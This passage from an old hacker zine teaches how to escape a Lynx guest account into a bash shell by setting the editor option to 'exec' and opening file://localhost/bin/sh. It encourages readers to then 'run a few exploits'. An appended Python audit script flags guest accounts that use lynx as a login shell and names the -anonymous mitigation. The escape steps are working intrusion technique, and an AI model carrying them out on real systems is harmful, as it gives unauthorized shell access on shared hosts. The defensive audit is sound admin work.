 e(M)acs keys                 : OFF
 K)eypad mode                 : Numbers act as arrows
 li(N)e edit style            : Default Binding
 l(I)st directory style       : Mixed style
 sho(W) dot files             : OFF
 U)ser mode                   : Novice
 user (A)gent                 : Lynx/2.6 libwww-FM/2.14

Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
-----------------------------------------------------------------------------

Notice the E)ditor option. That's what we're after. The purpose of it is to edit the file currently open in lynx with the supplied text editor. Lynx usually expects you to put in something like joe, pico, vi, etc. But we can supply anything we want, and it will use it with the syntax: [editor]

Ok, here's where we get innovative. Hit 'E' to type in an editor. For the editor, type: exec. Ah yes, those of experience are now starting to nod their heads. Now hit 'shift+period key' or '>' to save the options. You now return to the default screen. Next step. Hit 'g'. You will be prompted to enter a URL. For the URL put the following:

file://localhost/bin/sh

If all goes according to plan, /bin/sh will open as binary garbage in lynx. Now, normally if you hit 'e' with a default text editor set in the options menu, it would edit /bin/sh as a text file. But thanks to our little exec fix, it will now exec /bin/sh. And we all know what that does: pops us into a bash shell! Here's an example of the act in progress...
-----------------------------------------------------------------------------
ELF4ð?4 (444 ÔÔÔéééyyÌH¬[Ä1ÄÁÄÁ/lib/ld-linux.so.1j5H[&mU dao Qx")Bs|Ng8LW+ST
eP{ut!i:@%`Mb9Aq7>=.~ZGFY/OôÃ]ØPc¸ÂToh"w"~È&"`ÂTè("X& è$«H@³ ÃT¾h"Åø"ÌØ"Ô&"Ûø"ä
("íØG"öØbýxWx<"x<¨Ì(F*l0j98tBK\ÂRÃ_T§ñÿfTÂñÿmTÂñÿy4Õñÿlibtermcap.so.2strcpyioct
ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB
C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB
AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype
_toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm
atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact
ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq
sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate
rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll
seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp
-- press space for next page --
  Arrow keys: Up and Down to move.  Right to follow a link; Left to go back.
bash$ O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------

If you look in the very bottom left corner you will see it! (bash$) A simple 'clear' command will get rid of the rest of that mess. Oftentimes the TERM setting will be all messed up. Simply fix that by typing:

TERM=vt100
export TERM

And there you have it folks, a bash shell popped off of a lynx guest account. Now feel free to look around, run a few exploits, whatever; what you do beyond here is totally up to you. Hope you enjoyed today's little lesson, and I hope you get a chance to put it to work sometime. Take it easy all.
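From the admin side, the weak point this article relies on is a guest account whose login "shell" is an interactive program like lynx, which is not a sandbox. The following audit is an added example written for this page (not code from the zine or from the Lynx project); the sample passwd entries, the shell list and the account names are constructed for illustration.

```python
import os

# Constructed sample /etc/passwd and /etc/shells contents (not from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
lynx:x:1001:1001:Lynx Guest Account:/home/lynx:/usr/bin/lynx
guest:x:1002:1002:Guest:/home/guest:/usr/bin/lynx
www:x:1003:1003:Web:/var/www:/bin/false
bob:x:1004:1004:Bob:/home/bob:/usr/local/bin/menu
alice:x:1005:1005:Alice:/home/alice:/bin/bash
"""
SAMPLE_SHELLS = {"/bin/sh", "/bin/bash"}

# Shells that only refuse a session: harmless as a guest account's shell.
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}
# Applications with an editor/exec escape when used as a login shell; lynx's
# E)ditor option runs whatever command the user types against the current file.
ESCAPE_PRONE_APPS = {"lynx"}
# Guest login names the article lists as commonly tried.
COMMON_GUEST_LOGINS = {"lynx", "guest", "www"}

def parse_passwd(text):
    """Return (login, shell) pairs for each well-formed 7-field entry."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 7 and not line.startswith("#"):
            entries.append((fields[0], fields[6]))
    return entries

def audit_guest_shells(passwd_text, valid_shells):
    """Return {login: [reasons]} for accounts whose shell deserves review."""
    findings = {}
    for name, shell in parse_passwd(passwd_text):
        if shell in NOLOGIN_SHELLS:
            continue  # cannot log in at all, so nothing to escape from
        reasons = []
        if os.path.basename(shell) in ESCAPE_PRONE_APPS:
            reasons.append("application shell with editor/exec escape: " + shell)
        elif shell not in valid_shells:
            reasons.append("shell not listed in /etc/shells: " + shell)
        if name in COMMON_GUEST_LOGINS:
            reasons.append("well-known guest login name")
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    for login, why in audit_guest_shells(SAMPLE_PASSWD, SAMPLE_SHELLS).items():
        print(login + ": " + "; ".join(why))
```

On a real host, read /etc/passwd and /etc/shells into the two arguments; a flagged guest account should get a nologin shell or a wrapper that starts lynx with its -anonymous switch, which applies the browser's anonymous-account restrictions (the editor option among them).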
---------[End]---------------------------------------------------------------

----------------------------------------------------------------------
URL OF THE MONTH
BBM.DYN.ML.ORG
Title: The Blue Box Moon
Author: Delphian Q

The Blue Box Moon, What a glorious Site. Not only does this site provide A WEALTH of Information but it has something to fit everyone. I have spoken to the author of this page who is a very Moral and Respectable person. Delphian is a person That is to be respected at all times, so if you ever see him on IRC please don't fuck with him. This section is especially dedicated to him. Thank you for all the help you have provided, DelphianQ.

SKaLaR109 NPA/97

Closing Ceremonies
_________________________________
Well that's it for this one. I'd like to say thanks to all who wrote, helped or annoyed me. Just like to say thanks to SKaLaR109 for not killing me for being so late with this, and Aardwolf for reminding me to get this thing done. So...

  __ _    _______    __
 /| \   /| |   /| _____ |  /| \
 | | \| |   | | | |___/ |  | | \
 | | |\ \ | | | | _____/ | | |\ \
 | | | \ \| | | | |___/ | | _ \
 | | |\ \ | | | | | | | \ \
 | |_| \ \__| | |_| | |_|\ \__\
 |/__/ \/__/ |/__/ |/__/ \/__/